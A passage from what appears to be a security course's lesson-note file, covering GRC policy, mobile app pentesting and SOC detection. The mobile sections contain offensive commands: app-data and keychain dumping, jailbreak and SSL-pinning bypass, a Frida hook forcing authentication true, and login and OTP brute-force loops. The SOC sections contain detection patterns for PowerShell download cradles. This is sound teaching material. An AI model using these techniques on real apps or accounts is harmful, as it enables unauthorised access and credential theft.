\`\`\`
┌─────────────────────────────────────┐
│           POLICIES                  │  ← What (high-level rules)
│  "All data must be encrypted"       │
├─────────────────────────────────────┤
│          STANDARDS                  │  ← How specifically
│  "Use AES-256 for data at rest"     │
├─────────────────────────────────────┤
│         PROCEDURES                  │  ← Step-by-step
│  "1. Open KMS  2. Generate key..."  │
├─────────────────────────────────────┤
│         GUIDELINES                  │  ← Recommendations
│  "Consider using HSMs for keys"     │
└─────────────────────────────────────┘
\`\`\`

## Essential Security Policies
1. **Information Security Policy** — Overarching security commitment
2. **Acceptable Use Policy (AUP)** — Rules for using company resources
3. **Access Control Policy** — Who can access what
4. **Data Classification Policy** — How to categorize and handle data
5. **Incident Response Policy** — How to handle security events
6. **Password Policy** — Complexity, rotation, storage rules
7. **Remote Work Policy** — Security requirements for remote access
8. **BYOD Policy** — Personal device usage rules
9. **Change Management Policy** — How changes are approved/deployed
10. **Business Continuity Policy** — Disaster recovery and continuity

## Policy Template Structure
\`\`\`
1. Purpose — Why this policy exists
2. Scope — Who and what it applies to
3. Definitions — Key terms
4. Policy Statements — The actual rules
5. Roles & Responsibilities — Who does what
6. Compliance — Consequences of non-compliance
7. Related Documents — Standards, procedures, references
8. Review Schedule — When the policy is reviewed
9. Version History — Change log
\`\`\`

## Writing Effective Policies
- Use **clear, unambiguous language** — avoid jargon
- Make policies **enforceable** — don't write rules you can't enforce
- Keep them **concise** — long policies don't get read
- Include **exceptions process** — how to request exemptions
- Define **ownership** — who maintains and enforces each policy
- Set **review cadence** — annually at minimum`,

  "grc-audit-process": `## Security Auditing & Assessment

Security auditing is the systematic evaluation of an organization's information security controls against established criteria.

## Types of Audits
| Type | Description | Performed By |
|------|-------------|-------------|
| **Internal Audit** | Self-assessment | Internal team |
| **External Audit** | Independent assessment | Third-party auditor |
| **Compliance Audit** | Regulatory requirement check | Certified auditor |
| **Technical Audit** | System/network assessment | Security engineers |

## The Audit Process

### 1. Planning
- Define audit scope and objectives
- Identify applicable standards (ISO 27001, SOC 2, PCI-DSS)
- Create audit timeline and resource plan
- Notify stakeholders and schedule interviews

### 2. Evidence Collection
\`\`\`
Evidence Types:
├── Documentary Evidence
│   ├── Policies and procedures
│   ├── System configurations
│   ├── Training records
│   └── Meeting minutes
├── Technical Evidence
│   ├── System logs
│   ├── Scan reports
│   ├── Access control lists
│   └── Encryption configurations
├── Testimonial Evidence
│   ├── Staff interviews
│   ├── Process walkthroughs
│   └── Management assertions
└── Observational Evidence
    ├── Physical security checks
    ├── Process observation
    └── System demonstrations
\`\`\`

### 3. Testing Controls
- **Inquiry** — Interview control owners
- **Observation** — Watch controls in operation
- **Inspection** — Examine documentation and artifacts
- **Re-performance** — Execute the control yourself

### 4. Reporting
- **Executive Summary** — High-level findings for leadership
- **Detailed Findings** — Each finding with evidence
- **Risk Rating** — Critical / High / Medium / Low / Informational
- **Recommendations** — Specific remediation guidance
- **Management Response** — Auditee's action plan

### 5. Follow-Up
- Track remediation of findings
- Verify fixes are implemented
- Re-test if necessary
- Update risk register

## Common Audit Findings
- Missing or outdated security policies
- Excessive access privileges
- Unpatched systems
- Lack of logging and monitoring
- Inadequate backup testing
- Missing security awareness training`,

  "grc-privacy-gdpr": `## Privacy Regulations & GDPR

Data privacy regulations govern how organizations collect, process, store, and share personal information. Understanding these laws is essential for any security professional.

## GDPR (General Data Protection Regulation)

### Key Principles
1. **Lawfulness, Fairness, Transparency** — Process data legally with clear communication
2. **Purpose Limitation** — Collect data only for specified purposes
3. **Data Minimization** — Collect only what's necessary
4. **Accuracy** — Keep personal data accurate and up to date
5. **Storage Limitation** — Don't keep data longer than needed
6. **Integrity & Confidentiality** — Protect data with appropriate security
7. **Accountability** — Demonstrate compliance

### Data Subject Rights
- **Right of Access** — Know what data is collected about you
- **Right to Rectification** — Correct inaccurate data
- **Right to Erasure** ("Right to be Forgotten") — Request data deletion
- **Right to Restrict Processing** — Limit how data is used
- **Right to Data Portability** — Receive data in a portable format
- **Right to Object** — Object to certain processing activities

### Key Roles
- **Data Controller** — Determines purposes and means of processing
- **Data Processor** — Processes data on behalf of the controller
- **Data Protection Officer (DPO)** — Oversees compliance (required for large-scale processing)

### Penalties
- **Tier 1**: Up to €10M or 2% of global annual revenue
- **Tier 2**: Up to €20M or 4% of global annual revenue

## Other Major Regulations

### CCPA / CPRA (California)
- Applies to businesses handling California residents' data
- Right to know, delete, opt-out of sale
- Private right of action for data breaches

### HIPAA (Healthcare — US)
- Protects Protected Health Information (PHI)
- Security Rule: Technical, physical, administrative safeguards
- Breach notification within 60 days
- Penalties up to $1.5M per violation category per year

### PIPEDA (Canada)
- 10 fair information principles
- Consent-based framework
- Applies to commercial activity across provinces

## Privacy Impact Assessment (PIA)
A PIA evaluates how a project or system affects the privacy of individuals:
1. Describe the information flows
2. Identify privacy risks
3. Assess necessity and proportionality
4. Identify measures to mitigate risks
5. Document and sign off`,

  // ═══════════════════════════════════════════
  // MOBILE SECURITY — Missing lesson notes
  // ═══════════════════════════════════════════

  "mobile-android-basics": `## Android App Architecture

Understanding Android's architecture is the foundation of mobile security testing. Every Android app runs in its own sandbox with its own Linux user ID.

## APK Structure
\`\`\`
app.apk
├── AndroidManifest.xml    ← App configuration, permissions, components
├── classes.dex            ← Compiled Java/Kotlin bytecode (Dalvik)
├── resources.arsc         ← Compiled resources
├── res/                   ← Resource files (layouts, images)
├── assets/                ← Raw asset files
├── lib/                   ← Native libraries (.so files)
│   ├── armeabi-v7a/
│   ├── arm64-v8a/
│   └── x86_64/
└── META-INF/              ← Signing information
\`\`\`

## Core Components
### Activities
- UI screens the user interacts with
- Can be launched by other apps if exported
- Security risk: exported activities bypass authentication

### Services
- Background tasks (music playback, data sync)
- Bound services expose interfaces to other apps
- Security risk: unprotected services leak data

### Content Providers
- Structured data sharing between apps
- SQL-based interface (query, insert, update, delete)
- Security risk: SQL injection, path traversal

### Broadcast Receivers
- Listen for system-wide or app events
- Can be registered dynamically or in manifest
- Security risk: intercept sensitive broadcasts

### Intents
- Messaging objects for component communication
- **Explicit**: Target specific component
- **Implicit**: Any matching component can handle it
- Security risk: intent sniffing, injection

## Android Security Model
- **Application Sandbox** — Each app runs in its own process with unique UID
- **Permissions** — Apps must request access to sensitive resources
- **SELinux** — Mandatory Access Control enforces security policies
- **Verified Boot** — Ensures device integrity at boot
- **App Signing** — All APKs must be digitally signed

## Setting Up a Test Environment
1. Install Android Studio (includes emulator and ADB)
2. Create an emulator with Google APIs (for root access)
3. Install Frida server on the device
4. Configure Burp Suite proxy for traffic interception
5. Install target app (from APK or Play Store)`,

  "mobile-android-reversing": `## APK Reverse Engineering

Reverse engineering APKs reveals the app's internal logic, hardcoded secrets, and potential vulnerabilities that aren't visible from the surface.

## Decompilation Tools

### apktool — Resource Extraction
\`\`\`bash
# Decompile APK (smali + resources)
apktool d app.apk -o output/

# Key files to examine:
# output/AndroidManifest.xml  ← Permissions, exported components
# output/smali/               ← Dalvik bytecode (readable assembly)
# output/res/                 ← Layouts, strings, configs

# Rebuild modified APK
apktool b output/ -o modified.apk
\`\`\`

### jadx — Java Source Recovery
\`\`\`bash
# Decompile to Java source
jadx app.apk -d output/

# Open in GUI for easy browsing
jadx-gui app.apk

# Key things to search for:
grep -r "api_key" output/
grep -r "password" output/
grep -r "secret" output/
grep -r "http://" output/    # Insecure connections
grep -r "firebase" output/   # Firebase misconfigurations
\`\`\`

## What to Look For
### Hardcoded Secrets
\`\`\`java
// Common findings
String API_KEY = "AIzaSyB...";           // Google API key
String AWS_KEY = "AKIAIOSFODNN7...";     // AWS access key
String SECRET = "my_super_secret_key";   // Encryption key
String BASE_URL = "https://staging-api..."; // Internal endpoints
\`\`\`

### Insecure Configurations
- **android:debuggable="true"** — App can be debugged
- **android:allowBackup="true"** — Data extractable via ADB
- **android:usesCleartextTraffic="true"** — HTTP allowed
- **exported="true"** on activities/services — Accessible by other apps

### Obfuscation
- **ProGuard/R8** — Renames classes and methods (reversible with patience)
- **DexGuard** — Commercial, stronger obfuscation
- **String encryption** — Strings decrypted at runtime
- **Native code** — Critical logic moved to .so files

## Re-signing Modified APKs
\`\`\`bash
# Generate a signing key
keytool -genkey -v -keystore my.keystore -alias mykey -keyalg RSA -keysize 2048

# Sign the APK
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my.keystore modified.apk mykey

# Align the APK
zipalign -v 4 modified.apk aligned.apk

# Install
adb install aligned.apk
\`\`\``,

  "mobile-android-vulns": `## Common Android Vulnerabilities

These are the most frequently found vulnerabilities in Android app security assessments, aligned with the OWASP Mobile Top 10.

## 1. Insecure Data Storage
\`\`\`bash
# Check SharedPreferences (often stores tokens/credentials in plaintext)
adb shell cat /data/data/com.app/shared_prefs/*.xml

# Check SQLite databases
adb shell sqlite3 /data/data/com.app/databases/app.db ".tables"
adb shell sqlite3 /data/data/com.app/databases/app.db "SELECT * FROM users;"

# Check external storage (world-readable)
adb shell ls /sdcard/Android/data/com.app/

# Check logs for sensitive data leakage
adb logcat | grep -i "token|password|key|secret"
\`\`\`

## 2. Hardcoded Credentials & Keys
- API keys embedded in source code or resources
- Encryption keys in SharedPreferences or strings.xml
- Firebase database URLs with no authentication rules
- Backend URLs for staging/development environments

## 3. Insecure Communication
- HTTP used instead of HTTPS
- Certificate pinning not implemented
- Custom TrustManagers that accept all certificates
\`\`\`java
// Vulnerable: Accepts all certificates
TrustManager[] trustAllCerts = new TrustManager[]{
    new X509TrustManager() {
        public void checkClientTrusted(X509Certificate[] chain, String authType) {}
        public void checkServerTrusted(X509Certificate[] chain, String authType) {}
        public X509Certificate[] getAcceptedIssuers() { return new X509Certificate[0]; }
    }
};
\`\`\`

## 4. Deep Link Abuse
\`\`\`xml
<!-- Vulnerable: No host/scheme validation -->
<intent-filter>
    <action android:name="android.intent.action.VIEW" />
    <data android:scheme="myapp" />
</intent-filter>
\`\`\`
- Attacker can craft links: \`myapp://transfer?to=attacker&amount=1000\`

## 5. WebView Vulnerabilities
\`\`\`java
// Dangerous WebView settings
webView.getSettings().setJavaScriptEnabled(true);
webView.getSettings().setAllowFileAccess(true);
webView.addJavascriptInterface(new MyInterface(), "Android");
// → Allows JS to call Java methods
\`\`\`

## 6. Exported Components
\`\`\`bash
# Find exported activities
aapt dump xmltree app.apk AndroidManifest.xml | grep -A5 "activity"

# Launch exported activity (bypassing auth)
adb shell am start -n com.app/.AdminActivity

# Query exported content provider
adb shell content query --uri content://com.app.provider/users
\`\`\`

## Testing Checklist
- [ ] Check all data storage locations for sensitive data
- [ ] Search for hardcoded secrets in decompiled code
- [ ] Verify HTTPS enforcement and certificate pinning
- [ ] Test all exported components for unauthorized access
- [ ] Check WebView configurations for JavaScript bridges
- [ ] Test deep links for parameter injection
- [ ] Verify clipboard doesn't contain sensitive data
- [ ] Check for screenshot/task-switcher data leakage`,

  "mobile-ios-basics": `## iOS App Architecture & Security

iOS has a fundamentally different security model from Android, built around a walled garden approach with strong hardware-backed security.

## IPA Structure
\`\`\`
app.ipa (ZIP archive)
└── Payload/
    └── App.app/
        ├── Info.plist         ← App configuration
        ├── App (binary)       ← Compiled Mach-O executable
        ├── Frameworks/        ← Embedded frameworks
        ├── Assets.car         ← Compiled asset catalog
        ├── Base.lproj/        ← Storyboards, XIBs
        ├── _CodeSignature/    ← Code signing info
        └── embedded.mobileprovision ← Provisioning profile
\`\`\`

## iOS Security Architecture
### Hardware Security
- **Secure Enclave** — Isolated processor for cryptographic operations
- **Secure Boot Chain** — Each stage verifies the next before executing
- **Touch ID / Face ID** — Biometric data never leaves the Secure Enclave

### Software Security
- **App Sandbox** — Each app has its own filesystem container
- **Code Signing** — All code must be signed by Apple or a trusted developer
- **ASLR** — Address Space Layout Randomization prevents memory exploits
- **ARC** — Automatic Reference Counting prevents memory corruption

### Data Protection Classes
| Class | Description | Key Available |
|-------|-------------|---------------|
| **Complete Protection** | Encrypted when locked | Only when unlocked |
| **Protected Unless Open** | Encrypted when locked (existing files accessible) | Until file closed |
| **Protected Until First Auth** | Encrypted until first unlock after boot | After first unlock |
| **No Protection** | Always accessible | Always |

## App Transport Security (ATS)
- Enforces HTTPS for all network connections by default
- Minimum TLS 1.2
- Forward secrecy required
- Exceptions must be declared in Info.plist

## Entitlements & Capabilities
\`\`\`xml
<key>com.apple.developer.associated-domains</key>
<array>
    <string>applinks:example.com</string>
</array>
<key>keychain-access-groups</key>
<array>
    <string>$(AppIdentifierPrefix)com.example.app</string>
</array>
\`\`\`

## Setting Up iOS Testing
1. **Jailbroken device** (preferred) or **Corellium** (cloud)
2. Install **Cydia** package manager
3. Install **Frida** server via Cydia
4. Install **Objection** on your host machine
5. Configure **Burp Suite** proxy with device trust
6. Use **3uTools** or **ideviceinstaller** for app management`,

  "mobile-ios-testing": `## iOS Penetration Testing

iOS pentesting requires either a jailbroken physical device or a cloud-based solution like Corellium. The testing methodology differs from Android due to iOS's stricter security model.

## Essential Tools

### Objection — Runtime Exploration
\`\`\`bash
# Connect to running app
objection -g "com.example.app" explore

# Explore the filesystem
ios hooking list classes         # List all classes
ios hooking list methods MyClass # List methods of a class
ios cookies get                  # Dump cookies
ios pboard monitor               # Monitor pasteboard/clipboard
ios keychain dump                # Dump keychain items
ios nsuserdefaults get           # Read NSUserDefaults

# Bypass jailbreak detection
ios jailbreak disable            # Automatic bypass
ios jailbreak simulate           # Simulate non-jailbroken state

# Bypass SSL pinning
ios sslpinning disable           # Disable certificate pinning
\`\`\`

### Frida — Dynamic Instrumentation
\`\`\`javascript
// Hook a method to see its arguments
Interceptor.attach(ObjC.classes.LoginController["- validatePassword:"].implementation, {
    onEnter: function(args) {
        console.log("Password: " + ObjC.Object(args[2]).toString());
    },
    onLeave: function(retval) {
        console.log("Result: " + retval);
        retval.replace(ptr(1)); // Force return true
    }
});
\`\`\`

## Jailbreak Detection Bypass

### Common Detection Methods
- Check for Cydia/Sileo installation
- Attempt to write outside sandbox
- Check for SSH daemon
- Detect Frida/Objection processes
- Verify code signing integrity

### Bypass Techniques
\`\`\`bash
# Using Objection
objection -g "com.app" explore --startup-command "ios jailbreak disable"

# Using Frida script
frida -U -f com.app -l jb_bypass.js --no-pause

# Using Liberty Lite (Cydia tweak)
# Install from Cydia → Settings → Enable for target app

# Using Shadow (Cydia tweak)
# More modern alternative to Liberty Lite
\`\`\`

## Binary Analysis
\`\`\`bash
# Check binary protections
otool -hv App            # Architecture info
otool -l App | grep PIE  # ASLR enabled?
otool -l App | grep crypt # Encrypted?
otool -L App             # Linked libraries

# Decrypt binary (on jailbroken device)
frida-ios-dump -u <usb> -p <port> com.example.app

# Class dump
class-dump App > headers.h
\`\`\`

## Testing Methodology
1. **Static Analysis** — Decompile, review code, check configurations
2. **Dynamic Analysis** — Hook functions, monitor behavior at runtime
3. **Network Analysis** — Intercept and analyze API traffic
4. **Data Storage** — Check keychain, plist, SQLite, cache files
5. **Authentication** — Test biometric bypass, session management
6. **IPC** — Test URL schemes, universal links, extensions`,

  "mobile-ios-keychain": `## Keychain & Data Protection

The iOS Keychain is the recommended secure storage mechanism, but improper usage can lead to data exposure. Understanding keychain security is critical for iOS pentesting.

## Keychain Basics
The keychain stores:
- Passwords and authentication tokens
- Encryption keys and certificates
- Wi-Fi credentials
- App-specific secrets

## Keychain Access Classes
\`\`\`
kSecAttrAccessibleWhenUnlocked
  → Available only when device is unlocked (recommended)

kSecAttrAccessibleAfterFirstUnlock  
  → Available after first unlock until restart (common default)

kSecAttrAccessibleAlways (DEPRECATED)
  → Always available, even when locked (INSECURE!)

kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly
  → Requires passcode, never backed up (most secure)
\`\`\`

## Dumping the Keychain
\`\`\`bash
# Using Objection
objection -g "com.example.app" explore
ios keychain dump
ios keychain dump --json  # JSON output for analysis

# Using Frida
frida -U -l keychain-dump.js com.example.app

# Using keychain-dumper (on jailbroken device)
./keychain_dumper -a  # Dump all accessible items
\`\`\`

## Common Keychain Findings
### Insecure Access Classes
\`\`\`
Finding: Token stored with kSecAttrAccessibleAlways
Impact: Accessible even when device is locked
Fix: Use kSecAttrAccessibleWhenUnlocked
\`\`\`

### Missing Access Control Flags
\`\`\`
Finding: No biometric/passcode requirement for sensitive items
Impact: Any app with keychain-access-group can read items
Fix: Add kSecAccessControlBiometryAny or kSecAccessControlDevicePasscode
\`\`\`

## Other Data Storage Locations
### NSUserDefaults
\`\`\`bash
# Read NSUserDefaults (plist file)
objection -g "com.app" explore
ios nsuserdefaults get

# On device
cat /var/mobile/Containers/Data/Application/<UUID>/Library/Preferences/com.app.plist
\`\`\`
**Never store sensitive data here** — it's a plain XML plist file.

### SQLite Databases
\`\`\`bash
# Find databases
find /var/mobile/Containers/Data/Application/<UUID> -name "*.db" -o -name "*.sqlite"

# Query
sqlite3 app.db ".tables"
sqlite3 app.db "SELECT * FROM credentials;"
\`\`\`

### Cache & Cookies
\`\`\`bash
# WebView cache
/Library/Caches/com.app/
/Library/WebKit/

# HTTP cookies
/Library/Cookies/Cookies.binarycookies
\`\`\`

## Secure Storage Best Practices
- Use keychain with **WhenUnlockedThisDeviceOnly** for tokens
- Add **biometric access control** for high-value items
- Never store secrets in **NSUserDefaults, plist, or hardcoded**
- Enable **Data Protection** for files containing sensitive data
- Clear sensitive data from **memory** when no longer needed`,

  "mobile-api-testing": `## Mobile API Vulnerability Testing

Mobile backend APIs often have weaker security controls than web APIs because developers assume the mobile app is the only client. This creates significant opportunities for vulnerability discovery.

## Common Mobile API Vulnerabilities

### 1. Broken Authentication
\`\`\`bash
# Test token expiration
# Save a valid token, wait, try to reuse it
curl -H "Authorization: Bearer <old_token>" https://api.app.com/me

# Test token after password change
# Old tokens should be invalidated
curl -H "Authorization: Bearer <pre_change_token>" https://api.app.com/me

# Test token after logout
curl -H "Authorization: Bearer <logged_out_token>" https://api.app.com/me
\`\`\`

### 2. Broken Object-Level Authorization (BOLA/IDOR)
\`\`\`bash
# Access another user's data by changing IDs
GET /api/users/123/profile  ← Your profile
GET /api/users/124/profile  ← Someone else's profile (should be denied)

# Try UUID enumeration
GET /api/orders/550e8400-e29b-41d4-a716-446655440000
\`\`\`

### 3. Excessive Data Exposure
\`\`\`json
// API returns more data than the app displays
{
  "user": {
    "name": "John",           // Displayed in app
    "email": "john@test.com", // Displayed in app  
    "ssn": "123-45-6789",     // NOT displayed but returned!
    "password_hash": "...",   // NOT displayed but returned!
    "internal_id": 42,        // NOT displayed but returned!
    "role": "admin"           // NOT displayed but returned!
  }
}
\`\`\`

### 4. Missing Rate Limiting
\`\`\`bash
# Test brute force on login
for i in $(seq 1 1000); do
  curl -X POST https://api.app.com/login \\
    -d '{"email":"victim@test.com","password":"attempt'$i'"}'
done

# Test OTP brute force (4-digit = only 10,000 attempts)
for i in $(seq 0000 9999); do
  curl -X POST https://api.app.com/verify-otp \\
    -d '{"otp":"'$(printf "%04d" $i)'"}'
done
\`\`\`

### 5. Mass Assignment
\`\`\`bash
# Normal profile update
PUT /api/profile
{"name": "John", "bio": "Hello"}

# Try adding privileged fields
PUT /api/profile
{"name": "John", "bio": "Hello", "role": "admin", "is_verified": true}
\`\`\`

## API Testing Methodology
1. **Map all endpoints** — Intercept all traffic, document every API call
2. **Test authentication** — Token handling, session management, password flows
3. **Test authorization** — IDOR, role-based access, horizontal/vertical escalation
4. **Test input validation** — SQLi, XSS, command injection in API params
5. **Check data exposure** — Compare API responses vs. what the app displays
6. **Test rate limiting** — Login, OTP, password reset, sensitive actions
7. **Test business logic** — Price manipulation, quantity tampering, race conditions

## Tools
- **Burp Suite** — Primary interception proxy
- **mitmproxy** — Scriptable alternative
- **Postman** — API testing and automation
- **MobSF** — Automated static + dynamic analysis`,

  // ═══════════════════════════════════════════
  // SOC ANALYST — Missing lesson notes
  // ═══════════════════════════════════════════

  "soc-intro": `## Introduction to the SOC

A Security Operations Center (SOC) is the centralized function responsible for monitoring, detecting, analyzing, and responding to cybersecurity threats in real-time.

## SOC Analyst Tiers

### Tier 1 — Alert Triage (L1)
- Monitor SIEM dashboards and alerts
- Perform initial triage and classification
- Escalate confirmed incidents to L2
- Document findings in ticketing system
- **Skills**: Log reading, basic forensics, tool familiarity

### Tier 2 — Incident Response (L2)
- Deep-dive investigation of escalated alerts
- Correlate events across multiple sources
- Contain and remediate confirmed incidents
- Develop detection rules and playbooks
- **Skills**: Advanced analysis, malware triage, forensics

### Tier 3 — Threat Hunting (L3)
- Proactive threat hunting without alerts
- Reverse engineering malware
- Threat intelligence analysis
- Architect detection strategies
- **Skills**: Advanced forensics, reverse engineering, threat intel

## SOC Key Metrics
| Metric | Description | Target |
|--------|-------------|--------|
| **MTTD** | Mean Time to Detect | < 24 hours |
| **MTTR** | Mean Time to Respond | < 4 hours |
| **MTTC** | Mean Time to Contain | < 1 hour |
| **FP Rate** | False Positive Rate | < 30% |
| **Alert Volume** | Daily alert count | Manageable per analyst |

## Daily SOC Workflow
\`\`\`
1. Shift handoff — Review overnight incidents and pending cases
2. Dashboard review — Check SIEM for new high-priority alerts
3. Alert triage — Classify alerts (TP/FP/Benign)
4. Investigation — Deep-dive into true positives
5. Containment — Isolate affected systems if needed
6. Documentation — Update tickets with findings
7. Escalation — Hand off complex cases to L2/L3
8. Shift report — Summarize activities for next shift
\`\`\`

## Essential SOC Tools
- **SIEM** — Splunk, Elastic, Microsoft Sentinel, IBM QRadar
- **SOAR** — Cortex XSOAR, Swimlane, Tines
- **EDR** — CrowdStrike, SentinelOne, Carbon Black
- **Ticketing** — Jira, ServiceNow, TheHive
- **Threat Intel** — MISP, VirusTotal, AbuseIPDB
- **Forensics** — Volatility, Autopsy, Velociraptor`,

  "soc-alert-triage": `## Alert Triage & Prioritization

Alert triage is the most critical skill for a SOC analyst. Efficiently classifying alerts as true positive, false positive, or benign reduces response time and prevents alert fatigue.

## Alert Classification
\`\`\`
┌─────────────────────────────────────────────┐
│              Incoming Alert                 │
└────────────────────┬────────────────────────┘
                     │
              ┌──────▼──────┐
              │   Triage    │
              └──────┬──────┘
         ┌───────────┼───────────┐
         ▼           ▼           ▼
  ┌─────────┐  ┌──────────┐  ┌──────────┐
  │  True   │  │  False   │  │  Benign  │
  │Positive │  │ Positive │  │  True +  │
  └────┬────┘  └────┬─────┘  └────┬─────┘
       │            │              │
  Investigate   Tune Rule    Document &
  & Respond     & Close      Close
\`\`\`

## Triage Decision Framework
Ask these questions for every alert:

1. **Is the source reliable?** — Known good/bad IP? Internal or external?
2. **Is the activity expected?** — Scheduled scan? Known maintenance?
3. **Is there context?** — Threat intel match? Part of a pattern?
4. **What's the scope?** — Single host or multiple? One user or many?
5. **What's the potential impact?** — Critical system? Sensitive data?

## Priority Matrix
| Severity | Criteria | Response Time |
|----------|----------|---------------|
| **P1 Critical** | Active breach, data exfil, ransomware | Immediate |
| **P2 High** | Confirmed malware, compromised account | < 1 hour |
| **P3 Medium** | Suspicious activity, policy violation | < 4 hours |
| **P4 Low** | Informational, minor policy violation | < 24 hours |

## Common Alert Types & Triage Steps

### Malware Detection
1. Check hash on VirusTotal — known malware?
2. Identify patient zero — who downloaded it?
3. Check execution — did it actually run?
4. Look for lateral movement — did it spread?
5. Contain if active — isolate the endpoint

### Brute Force / Failed Logins
1. Check source IP — internal or external?
2. Check target accounts — privileged accounts?
3. Look for success — did any attempt succeed?
4. Check velocity — how many attempts per minute?
5. Block if threshold exceeded — firewall rule or account lock

### Phishing
1. Check sender — known bad domain? Spoofed?
2. Check links/attachments — sandbox analysis
3. Identify recipients — how many users received it?
4. Check clicks — did anyone interact with it?
5. Contain — block sender, quarantine emails, reset credentials if clicked

## Reducing False Positives
- **Whitelist known-good** — Scheduled tasks, approved tools, scan IPs
- **Tune detection rules** — Add context, adjust thresholds
- **Enrich alerts** — Add threat intel, asset criticality, user context
- **Automate triage** — SOAR playbooks for common FP patterns`,

  "soc-splunk-basics": `## Splunk Fundamentals

Splunk is one of the most widely used SIEM platforms. Mastering SPL (Search Processing Language) is essential for SOC analysts.

## SPL Basics
\`\`\`spl
# Basic search
index=main sourcetype=syslog ERROR

# Time range
index=main earliest=-24h latest=now

# Field extraction
index=main src_ip=192.168.1.* | table _time, src_ip, dest_ip, action

# Statistics
index=firewall action=blocked 
| stats count by src_ip 
| sort -count 
| head 10

# Timechart
index=web_logs status=500 
| timechart span=1h count
\`\`\`

## Common SOC Searches

### Failed Login Analysis
\`\`\`spl
index=windows EventCode=4625 
| stats count by Account_Name, Source_Network_Address 
| where count > 5 
| sort -count
\`\`\`

### Suspicious Process Execution
\`\`\`spl
index=sysmon EventCode=1 
| search (CommandLine="*powershell*" OR CommandLine="*cmd*" OR CommandLine="*certutil*")
| table _time, Computer, User, CommandLine, ParentCommandLine
\`\`\`

### Network Connections to Known Bad IPs
\`\`\`spl
index=firewall 
| lookup threat_intel_ip ip AS dest_ip OUTPUT threat_category
| where isnotnull(threat_category)
| table _time, src_ip, dest_ip, threat_category, bytes_out
\`\`\`

### Data Exfiltration Detection
\`\`\`spl
index=proxy 
| stats sum(bytes_out) as total_bytes by src_ip, dest_host
| where total_bytes > 100000000
| sort -total_bytes
| eval total_MB=round(total_bytes/1024/1024,2)
\`\`\`

## SPL Operators
| Operator | Purpose | Example |
|----------|---------|---------|
| \`stats\` | Aggregate data | \`stats count by src_ip\` |
| \`eval\` | Create/modify fields | \`eval MB=bytes/1024/1024\` |
| \`where\` | Filter results | \`where count > 10\` |
| \`table\` | Select columns | \`table _time, user, action\` |
| \`sort\` | Order results | \`sort -count\` |
| \`dedup\` | Remove duplicates | \`dedup src_ip\` |
| \`lookup\` | Enrich with external data | \`lookup geo_ip ip AS src_ip\` |
| \`transaction\` | Group related events | \`transaction session_id\` |
| \`timechart\` | Time-based chart | \`timechart span=1h count\` |

## Creating Dashboards
1. Run your search query
2. Click "Save As" → Dashboard Panel
3. Choose visualization type (table, chart, map)
4. Set auto-refresh interval (e.g., every 5 minutes)
5. Add drill-down links for investigation`,

  "soc-elastic-siem": `## Elastic SIEM & Kibana

Elastic Security (formerly Elastic SIEM) provides free and open security analytics built on the ELK Stack (Elasticsearch, Logstash, Kibana).

## Architecture
\`\`\`
Data Sources → Beats/Agents → Logstash → Elasticsearch → Kibana
                                            ↓
                                     Elastic Security
                                     (Detection Rules,
                                      Timeline, Cases)
\`\`\`

## Key Components
- **Elasticsearch** — Search and analytics engine (stores all logs)
- **Kibana** — Visualization and dashboard interface
- **Beats** — Lightweight data shippers (Filebeat, Winlogbeat, Packetbeat)
- **Elastic Agent** — Unified agent for data collection and endpoint security
- **Fleet** — Centralized agent management

## KQL (Kibana Query Language)
\`\`\`
# Basic field search
event.action: "login-failed"

# Wildcards
process.name: powershell*

# Boolean operators
source.ip: 10.0.0.0/8 AND event.action: "connection-attempted"

# Nested fields
user.name: "admin" AND NOT source.ip: 192.168.*

# Range queries
http.response.status_code >= 400
\`\`\`

## Detection Rules

### Creating a Rule
1. Navigate to Security → Rules → Create new rule
2. Choose rule type:
   - **Custom query** — KQL-based detection
   - **Threshold** — Alert when count exceeds threshold
   - **EQL** — Event Query Language for sequences
   - **Machine Learning** — Anomaly detection

### Example: Brute Force Detection
\`\`\`
Rule type: Threshold
Query: event.action: "login-failed"
Group by: source.ip
Threshold: 10
Time window: 5 minutes
Severity: High
\`\`\`

### Example: Suspicious Process Sequence (EQL)
\`\`\`
sequence by host.name with maxspan=1m
  [process where process.name == "outlook.exe"]
  [process where process.name == "powershell.exe"]
\`\`\`

## Timeline Investigation
The Timeline feature lets you build investigation timelines:
1. Drag events from alerts or discover
2. Add notes and annotations
3. Pin important events
4. Save and share with team members
5. Convert to a Case for formal tracking

## Useful Kibana Dashboards for SOC
- **Security Overview** — Alert trends, top sources, geographic map
- **Host Events** — Process creation, file changes, network connections
- **Network Activity** — Traffic volume, protocols, anomalies
- **User Activity** — Logins, privilege changes, account modifications`,

  "soc-detection-rules": `## Writing Detection Rules

Detection engineering is the practice of creating, testing, and maintaining rules that identify malicious activity in your environment.

## Sigma Rules
Sigma is a vendor-agnostic detection rule format that can be converted to any SIEM's query language.

### Sigma Rule Structure
\`\`\`yaml
title: Suspicious PowerShell Download Cradle
id: 3b6ab547-8ec2-4991-b9d2-2b06702a48d7
status: production
description: Detects PowerShell commands commonly used to download and execute payloads
author: SOC Team
date: 2024/01/15
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - 'powershell'
            - 'downloadstring'
    condition: selection
falsepositives:
    - Legitimate admin scripts
level: high
tags:
    - attack.execution
    - attack.t1059.001
\`\`\`

### Converting Sigma to SIEM Queries
\`\`\`bash
# Convert to Splunk
sigma convert -t splunk rule.yml

# Convert to Elastic/EQL
sigma convert -t eql rule.yml

# Convert to Microsoft Sentinel (KQL)
sigma convert -t microsoft365defender rule.yml
\`\`\`

## Detection Categories (MITRE ATT&CK)

### Initial Access
- Phishing email with attachment (T1566.001)
- Drive-by compromise (T1189)
- Valid accounts usage (T1078)

### Execution
- PowerShell execution (T1059.001)
- Windows Management Instrumentation (T1047)
- Scheduled tasks (T1053)

### Persistence
- Registry run keys (T1547.001)
- Scheduled tasks (T1053.005)
- New service creation (T1543.003)

### Defense Evasion
- Process injection (T1055)
- Timestomping (T1070.006)
- Disabling security tools (T1562)

## Detection Rule Best Practices
1. **Start with known TTPs** — Use MITRE ATT&CK as your guide
2. **Test before deploying** — Run against historical data first
3. **Document false positives** — Include FP guidance in the rule
4. **Set appropriate severity** — Not everything is critical
5. **Include context** — Reference MITRE IDs, link to playbooks
6. **Review regularly** — Tune based on FP feedback from analysts
7. **Version control** — Store rules in Git with change history

## Custom Splunk Alert Example
\`\`\`spl
index=sysmon EventCode=1 
  (CommandLine="*-nop*" OR CommandLine="*-enc*" OR CommandLine="*hidden*")
